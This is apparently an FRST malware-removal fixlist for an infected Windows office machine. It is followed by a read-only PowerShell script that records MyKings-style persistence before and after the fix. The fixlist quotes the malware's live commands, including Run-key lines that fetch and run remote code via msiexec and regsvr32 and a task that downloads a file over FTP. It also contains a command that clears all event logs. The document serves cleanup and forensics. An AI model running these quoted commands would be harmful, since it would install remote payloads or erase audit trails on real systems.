CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKU\S-1-5-21-2466349035-1162948755-3129390652-1001\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\start.exe start.html
HKU\S-1-5-21-2466349035-1162948755-3129390652-1012\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\Setup.exe
HKU\S-1-5-21-2466349035-1162948755-3129390652-500\...\MountPoints2: {ad9cb492-4fac-11e3-88ae-806e6f6e6963} - D:\Setup.exe
ShortcutTarget: directINTEGRATOR ST5 — skrót.lnk -> C:\$Recycle.Bin\S-1-5-21-2466349035-1162948755-3129390652-500\$RHV5B1Y.exe (No File)
GroupPolicy: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b8e0babf-12df-48c0-99b0-da1cb82af076} <==== ATTENTION (Restriction - IP)
Tcpip\..\Interfaces\{717D4596-8E28-4A42-856C-C88BCE0D1E82}: [NameServer] 194.204.152.34,8.8.8.8
Tcpip\..\Interfaces\{717D4596-8E28-4A42-856C-C88BCE0D1E82}: [DhcpNameServer] 194.204.159.1 194.204.152.34
Tcpip\..\Interfaces\{8CCD8AED-302B-47A5-BD18-E8C88C3099CC}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{F4571956-A69A-4A30-9573-C54768218EEA}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Task: {255F93C1-A560-4512-981F-75082BDF597D} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {D42BEA24-EF4D-4AFF-AAAB-6E9164A6FE30} - \Mysa -> No File <==== ATTENTION
HKU\S-1-5-21-2466349035-1162948755-3129390652-1007\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1009\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1010\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1011\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1013\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-1015\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-2466349035-1162948755-3129390652-500\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKU\S-1-5-21-2466349035-1162948755-3129390652-500 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 
Toolbar: HKU\S-1-5-21-2466349035-1162948755-3129390652-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-2466349035-1162948755-3129390652-1017 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => not found
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => not found
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-1009\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\ADMINI~1.ITM\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2017-07-12]
CHR HKU\S-1-5-21-2466349035-1162948755-3129390652-500\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
ContextMenuHandlers1: [MVDShlext] -> {027B567F-6B25-42C1-9C0B-5CE8E04024BD} => C:\Program Files (x86)\Miray Virtual Disk 5.0\mvdextx64.dll -> No File
ContextMenuHandlers4: [MVDShlext] -> {027B567F-6B25-42C1-9C0B-5CE8E04024BD} => C:\Program Files (x86)\Miray Virtual Disk 5.0\mvdextx64.dll -> No File
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót (2) do BIO RAJ ulotki.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do BIO RAJ ulotki.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do Caribo_400g_Beutel_pr.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do FOLDER bakalie.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do FOLDER KASZE.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do fOLDER MAKARONY.lnk
C:\Users\Administrator.itm-Komputer\Dysk Google\ACT_Monika_i_Dorota\etykiety\Glony\Foto\biohurt\Skrót do fOLDER MĄKI.lnk
C:\Users\Administrator.itm-Komputer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directINTEGRATOR ST5 — skrót.lnk
C:\Users\Dorota Nizio\Desktop\directINTEGRATOR ST.lnk
C:\Users\monika\Desktop\directINTEGRATOR ST.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\directINTEGRATOR ST.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Konfigurator.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Odinstaluj program directINTEGRATOR ST5.lnk
C:\Users\monika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Pomoc.lnk
C:\Users\rk\Desktop\directINTEGRATOR ST.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\directINTEGRATOR ST.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Konfigurator.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Odinstaluj program directINTEGRATOR ST5.lnk
C:\Users\rk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\directSOFT\directINTEGRATOR ST - wersja dla SubiektGT\Pomoc.lnk
C:\Users\sklep\Links\Baza 2014.lnk
C:\Users\sklep\Links\Kontakty.lnk
C:\Users\sklep\Links\Zamówienia 2014.lnk
C:\Users\sklep\Desktop\directINTEGRATOR ST.lnk
C:\Users\sklep\Desktop\Konfigurator.exe — skrót.lnk
C:\Users\sklep\Desktop\TeamViewer.exe — skrót.lnk
C:\Users\sklep\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Adobe Reader XI.lnk
C:\Users\sklep\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\directINTEGRATOR ST5.exe — skrót.lnk
Task: {259ABC29-583B-4F53-AB39-ABB2BB899C8B} - System32\Tasks\GoogleUpdateTaskMachineUA1d08ef27c6ab824 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {26D42EF7-09D2-449C-A542-EFBAF26BC7FB} - System32\Tasks\GoogleUpdateTaskMachineUA1d15d6e49ad1187 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {53DBE49D-B85E-4595-AEB6-3E06900C0505} - System32\Tasks\GoogleUpdateTaskMachineUA1d12cb517fef1d9 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {553973E7-F010-4487-950B-2B1BC2BB8B44} - System32\Tasks\GoogleUpdateTaskMachineCore1d0e165d2b705aa => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {633E7B2E-951A-42B9-9D3B-3120B90428FA} - System32\Tasks\GoogleUpdateTaskMachineUA1d0f0c96150e1d1 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {6CA8B592-319C-4078-98A6-D3980804E011} - System32\Tasks\GoogleUpdateTaskMachineCore1d0bf602f0bf315 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {9D9D57A7-FB5D-428E-9820-29C863F958B8} - System32\Tasks\GoogleUpdateTaskMachineUA1d04054a84f15fb => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {AE498AC0-CAC8-48B6-9107-0BC67124AFD4} - System32\Tasks\GoogleUpdateTaskMachineUA1cf8c891c7f8242 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {B4A771C0-8AC1-440D-8AA1-3B121A306948} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {BE04FADB-7376-4AC0-BFBF-A00561B6795D} - System32\Tasks\GoogleUpdateTaskMachineCore1d15d6e49895ce3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D534EC0F-2373-424F-BA34-5408574E7432} - System32\Tasks\GoogleUpdateTaskMachineUA1d0bf602f2fa7b9 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {FE78F8D2-91FD-4B99-A5B2-3C8ECF460807} - System32\Tasks\GoogleUpdateTaskMachineCore1d0f0c9612d2d2d => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
EmptyTemp:
RemoveProxy:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
CMD: ipconfig /flushdns
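The fixlist above removes four kinds of persistence that belong together: the two HKLM Run values that load code straight from js.mykings.top (msiexec /i <url> and regsvr32 /i:<url> scrobj.dll, neither of which needs a file on disk), the Mysa/Mysa2 scheduled tasks (Mysa2 pulls s.dat from ftp.oo000oo.me into c:\windows\debug\item.dat), and the WMI ActiveScriptEventConsumer named *fuckyoumm2_consumer* in root\subscription. The PowerShell below is an added check, not part of the fixlist and not FRST's code: run it from an elevated prompt before the fix to record what is there, and again afterwards to confirm all four are gone. It assumes a Windows version with Get-ScheduledTask (Windows 8 / Server 2012 or later; on older systems replace that step with schtasks /query /v /fo csv); the indicator strings it matches are taken from the fixlist, and the report format is this script's own. Run it before the fix in particular because the consumer's ScriptText disappears with the subscription, and the fixlist's own Powershell: line clears every event log, so this output may be the only record kept of the infection.

```powershell
# Added example (not from the fixlist above): enumerate the persistence points the
# fixlist targets and flag the ones matching its indicators. Requires elevation.
$indicators = @('mykings.top', 'oo000oo.me', 'fuckyoumm', 'Mysa', 'scrobj.dll', 'item.dat')

function Test-Indicator([string]$Text) {
    foreach ($i in $indicators) {
        if ($Text -and $Text.IndexOf($i, [StringComparison]::OrdinalIgnoreCase) -ge 0) { return $true }
    }
    return $false
}

# 1. WMI event subscriptions: filter, consumer (script body or command line) and binding.
$wmi = @()
foreach ($class in '__EventFilter', 'ActiveScriptEventConsumer', 'CommandLineEventConsumer', '__FilterToConsumerBinding') {
    Get-WmiObject -Namespace 'root\subscription' -Class $class -ErrorAction SilentlyContinue | ForEach-Object {
        $obj = $_   # switch rebinds $_ to the tested value, so keep the WMI object here
        $detail = switch ($class) {
            '__EventFilter'             { $obj.Query }
            'ActiveScriptEventConsumer' { $obj.ScriptText }
            'CommandLineEventConsumer'  { $obj.CommandLineTemplate }
            default                     { "$($obj.Filter) -> $($obj.Consumer)" }
        }
        $wmi += [pscustomobject]@{ Class = $class; Name = $obj.Name; Detail = $detail }
    }
}

# 2. Machine-wide Run keys (FRST abbreviates both as HKLM\...\Run).
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
$run = foreach ($k in $runKeys) {
    if (Test-Path $k) {
        (Get-ItemProperty $k).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS' } |
            ForEach-Object { [pscustomobject]@{ Key = $k; Name = $_.Name; Command = $_.Value } }
    }
}

# 3. Scheduled tasks, flattened to one row per action.
$tasks = Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $t = $_
    $t.Actions | ForEach-Object {
        [pscustomobject]@{ Task = $t.TaskPath + $t.TaskName; Execute = $_.Execute; Arguments = $_.Arguments }
    }
}

# 4. The file the Mysa2 task downloads.
$drop = Get-Item 'C:\Windows\debug\item.dat' -ErrorAction SilentlyContinue

# Report only the entries that match the fixlist's indicators.
$hits = @()
$wmi   | ForEach-Object { if (Test-Indicator "$($_.Name) $($_.Detail)")  { $hits += "WMI  $($_.Class) $($_.Name): $($_.Detail)" } }
$run   | ForEach-Object { if (Test-Indicator "$($_.Name) $($_.Command)") { $hits += "RUN  $($_.Key)\$($_.Name) => $($_.Command)" } }
$tasks | ForEach-Object { if (Test-Indicator "$($_.Task) $($_.Execute) $($_.Arguments)") { $hits += "TASK $($_.Task) => $($_.Execute) $($_.Arguments)" } }
if ($drop) { $hits += "FILE $($drop.FullName) ($($drop.Length) bytes, written $($drop.LastWriteTime))" }

if ($hits) {
    Write-Warning "Fixlist indicators present:"
    $hits | ForEach-Object { Write-Output "  $_" }
} else {
    Write-Output 'No fixlist indicators in WMI subscriptions, Run keys, scheduled tasks or C:\Windows\debug.'
}
```

Save the pre-fix output (for example with `| Tee-Object -FilePath persistence-before.txt`); the WMI filter Query and the consumer's ScriptText are what show how the subscription re-launches the loader, and they are not recoverable once the fixlist has deleted the consumer and cleared the logs.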